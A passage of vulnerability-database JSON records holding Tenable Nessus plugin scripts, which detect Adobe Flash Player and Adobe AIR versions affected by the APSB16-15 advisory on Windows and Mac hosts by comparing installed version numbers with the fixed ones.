(CVE-2016-4116)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR version 21.0.0.215 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4117\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\ncutoff_version = '21.0.0.198';\nfix = '21.0.0.215';\nfix_ui = '21.0';\n\nif (ver_compare(ver:version, fix:cutoff_version) <= 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')' +\n '\\n';\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:report);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version_report, path);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:12:06", "description": "The version of Adobe Flash Player installed on the remote Windows host is equal or prior to 21.0.0.226. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an attacker to execute arbitrary code. 
(CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted .dll file, to execute arbitrary code. (CVE-2016-4116)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-16T00:00:00", "type": "nessus", "title": "Adobe Flash Player <= 21.0.0.226 Multiple Vulnerabilities (APSB16-15)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB16-15.NASL", "href": "https://www.tenable.com/plugins/nessus/91163", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91163);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n 
\"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_bugtraq_id(90505);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe Flash Player <= 21.0.0.226 Multiple Vulnerabilities (APSB16-15)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows\nhost is equal or prior to 21.0.0.226. It is, therefore, affected by \nmultiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1105,\n CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1097,\n CVE-2016-1106, CVE-2016-1107, CVE-2016-1108,\n CVE-2016-1109, CVE-2016-1110, CVE-2016-4108,\n CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an\n attacker to execute arbitrary code. 
(CVE-2016-1096,\n CVE-2016-1098, CVE-2016-1099, CVE-2016-1100,\n CVE-2016-1102, CVE-2016-1104, CVE-2016-4109,\n CVE-2016-4111, CVE-2016-4112, CVE-2016-4113,\n CVE-2016-4114, CVE-2016-4115, CVE-2016-4120,\n CVE-2016-4160, CVE-2016-4161, CVE-2016-4162,\n CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An\n attacker can exploit this, via a specially crafted .dll\n file, to execute arbitrary code. (CVE-2016-4116)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 21.0.0.242 or later.\n\nAlternatively, Adobe has made version 18.0.0.352 available for those\ninstallations that cannot be upgraded to the latest version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4117\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/12\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if(isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if(isnull(ver))\n continue;\n\n vuln = FALSE;\n\n # Chrome Flash <= 21.0.0.216\n if(variant == \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"21.0.0.216\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # <= 18.0.0.343\n if(variant != \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"18.0.0.343\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # 19 <= 21.0.0.241\n else if(variant != \"Chrome_Pepper\" && ver =~ \"^(?:19|[2-9]\\d)\\.\")\n {\n if (variant == \"ActiveX\" && ver_compare(ver:ver,fix:\"21.0.0.241\",strict:FALSE) <= 0)\n vuln = TRUE;\n else if (ver_compare(ver:ver,fix:\"21.0.0.226\",strict:FALSE) <= 0)\n vuln = TRUE;\n }\n\n if(vuln)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = 
files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"21.0.0.242 / 18.0.0.352\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"21.0.0.242 / 18.0.0.352\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n if(variant == \"Chrome\")\n fix = \"Upgrade to a version of Google Chrome running Flash Player 21.0.0.242\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 21.0.0.242 (Chrome PepperFlash)';\n else if(!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:12:06", "description": "The version of Adobe Flash Player installed on the remote Mac OS X host is equal or prior to 21.0.0.226. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an attacker to execute arbitrary code. 
(CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted .dll file, to execute arbitrary code. (CVE-2016-4116)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-16T00:00:00", "type": "nessus", "title": "Adobe Flash Player for Mac <= 21.0.0.226 Multiple Vulnerabilities (APSB16-15)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSB16-15.NASL", "href": "https://www.tenable.com/plugins/nessus/91165", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91165);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n 
\"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_bugtraq_id(90505);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe Flash Player for Mac <= 21.0.0.226 Multiple Vulnerabilities (APSB16-15)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Mac OS X\nhost is equal or prior to 21.0.0.226. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1105,\n CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1097,\n CVE-2016-1106, CVE-2016-1107, CVE-2016-1108,\n CVE-2016-1109, CVE-2016-1110, CVE-2016-4108,\n CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an\n attacker to execute arbitrary code. 
(CVE-2016-1096,\n CVE-2016-1098, CVE-2016-1099, CVE-2016-1100,\n CVE-2016-1102, CVE-2016-1104, CVE-2016-4109,\n CVE-2016-4111, CVE-2016-4112, CVE-2016-4113,\n CVE-2016-4114, CVE-2016-4115, CVE-2016-4120,\n CVE-2016-4160, CVE-2016-4161, CVE-2016-4162,\n CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An\n attacker can exploit this, via a specially crafted .dll\n file, to execute arbitrary code. (CVE-2016-4116)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 21.0.0.242 or later.\n\nAlternatively, Adobe has made version 18.0.0.352 available for those installs\nthat cannot be upgraded to the latest version\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4117\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/12\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (ver_compare(ver:version, fix:\"19.0.0.0\", strict:FALSE) >= 0)\n{\n cutoff_version = \"21.0.0.226\";\n fix = \"21.0.0.242\";\n}\nelse\n{\n cutoff_version = \"18.0.0.343\";\n fix = \"18.0.0.352\";\n}\n\n# we're checking for versions less than or equal to the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:17:28", "description": "The version of Adobe AIR installed on the remote Mac OS X host is prior or equal to version 21.0.0.198. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. 
(CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted .dll file, to execute arbitrary code. (CVE-2016-4116)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-16T00:00:00", "type": "nessus", "title": "Adobe AIR for Mac <= 21.0.0.198 Multiple Vulnerabilities (APSB16-15)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "MACOSX_ADOBE_AIR_APSB16-15.NASL", "href": "https://www.tenable.com/plugins/nessus/91164", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif 
(description)\n{\n script_id(91164);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_bugtraq_id(90505);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe AIR for Mac <= 21.0.0.198 Multiple Vulnerabilities (APSB16-15)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe AIR installed on the remote Mac OS X host is\nprior or equal to version 21.0.0.198. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1105,\n CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1097,\n CVE-2016-1106, CVE-2016-1107, CVE-2016-1108,\n CVE-2016-1109, CVE-2016-1110, CVE-2016-4108,\n CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an\n attacker to execute arbitrary code. 
(CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1096,\n CVE-2016-1098, CVE-2016-1099, CVE-2016-1100,\n CVE-2016-1102, CVE-2016-1104, CVE-2016-4109,\n CVE-2016-4111, CVE-2016-4112, CVE-2016-4113,\n CVE-2016-4114, CVE-2016-4115, CVE-2016-4120,\n CVE-2016-4160, CVE-2016-4161, CVE-2016-4162,\n CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An\n attacker can exploit this, via a specially crafted .dll\n file, to execute arbitrary code. (CVE-2016-4116)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR version 21.0.0.215 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4117\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
